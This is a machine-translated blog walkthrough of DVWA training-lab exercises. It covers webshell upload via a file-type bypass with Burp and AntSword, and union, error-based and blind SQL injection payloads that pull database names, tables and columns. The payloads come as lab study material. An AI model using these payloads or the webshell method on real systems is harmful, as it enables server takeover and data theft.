当前位置:网站首页>DVWA range exercise 4
DVWA range exercise 4
2022-07-04 12:40:00 【chenjyboke】
file upload( Upload files )
low
File upload vulnerability , Usually due to the type of upload file , The content is not strictly filtered , Check , So that the attacker can get the server's webshell jurisdiction , Therefore, the harm caused by file upload vulnerability is often devastating ,Apache,Tomcat,Nginx And so on are exposed file upload vulnerabilities .
Check the source code and find that there are no restrictions on the content of file types. Check for file upload vulnerabilities .
Make a word Trojan , The file format is php Upload files . Connect with an ant sword . Backstage .
Mdeium
Check the source code and find that the file type limit should be jepg Or for png
Edit a sentence: the Trojan horse is jpg Format upload , Use burp Capture the package and change the file format to php Format , After success, use ant sword to connect
SQL injection(sql Inject )
low
1、 Determine the type of Injection
Input 1 success , Input 1 and1=1 success Input 1’ Failure
It is judged as digital injection
2、 guess sql The number of fields in the query statement
Input 1’ order by 2# success Input 1’ order by 3# Failure , Determine that the number of fields is 2
3、 Get users , database , Version number
Input 1' union select 1,concat(user(),database(),version())#
4, Gets the tables in the database
1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #
medium
1. After submission burp Grab the bag , modify id=1 Change it to 1 and 1=2 union select 1,concat(database(),floor(rand(0)*2))x from information_schema.tables group by x #
Check in the response package
Repeat the above steps
2. Number of blasting tables : id=1 Change it to 1 and 1=2 union select 1,concat((select count(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x#
3. Name of blasting table : id=1 Change it to 1 and 1=2 union select 1,concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x#
4. Blast users Field name
id=1 Change it to 1 and 1=2 union select 1,concat((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 ),floor(rand(0)*2))x from information_schema.tables group by x#
SQL injection(sql Injection blind injection )
Determine the injection type and sql Inject the same
Judge the length of the database
Input 1’ and length(database())=1 #, Show that there is no ;
Input 1’ and length(database())=2 #, Show that there is no ;
Input 1’ and length(database())=3 #, Show that there is no ;
Input 1’ and length(database())=4 #, Show the presence of :
边栏推荐
- Pat 1059 prime factors (25 points) prime table
- Jetson TX2 configures common libraries such as tensorflow and pytoch
- Data communication and network: ch13 Ethernet
- Review of week 278 of leetcode II
- Argminer: a pytorch package for processing, enhancing, training, and reasoning argument mining datasets
- Iterm tab switching order
- World document to picture
- ArgMiner:一个用于对论点挖掘数据集进行处理、增强、训练和推理的 PyTorch 的包
- [Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 15
- Xshell's ssh server rejected the password, failed to skip publickey authentication, and did not register with the server
猜你喜欢
Data communication and network: ch13 Ethernet
【数据聚类】第四章第一节3:DBSCAN性能分析、优缺点和参数选择方法
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 20
DC-5 target
R language -- readr package reads and writes data
nn. Exploration and experiment of batchnorm2d principle
LVS load balancing cluster deployment - Dr direct routing mode
Fastlane one click package / release app - usage record and stepping on pit
16. Memory usage and segmentation
MySQL performance optimization index
随机推荐
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 13
C language: the sorting problem of circle number reporting
Googgle guava ImmutableCollections
PKCs 5: password based cryptography specification version 2.1 Chinese Translation
How to disable debug messages on sockjs stomp - how to disable debug messages on sockjs Stomp
The latest idea activation cracking tutorial, idea permanent activation code, the strongest in history
Star leap plan | new projects are continuously being recruited! MSR Asia MSR Redmond joint research program invites you to apply!
Pat 1059 prime factors (25 points) prime table
[notes] streamingassets
C语言:求字符串的长度
AI should take code agriculture? Deepmind offers a programming version of "Alpha dog" alphacode that surpasses nearly half of programmers!
Method of setting default items in C # ComboBox control code
French Data Protection Agency: using Google Analytics or violating gdpr
C fonctions linguistiques
The most robust financial products in 2022
When synchronized encounters this thing, there is a big hole, pay attention!
Paper notes ACL 2020 improving event detection via open domain trigger knowledge
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 9
mm_ Cognition of struct structure
Lecture 9